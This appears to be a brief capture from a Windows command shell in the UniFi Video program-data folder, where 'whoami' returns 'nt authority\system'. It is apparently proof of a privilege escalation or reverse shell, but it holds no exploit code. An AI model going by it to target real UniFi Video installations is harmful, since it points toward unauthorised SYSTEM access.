Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system
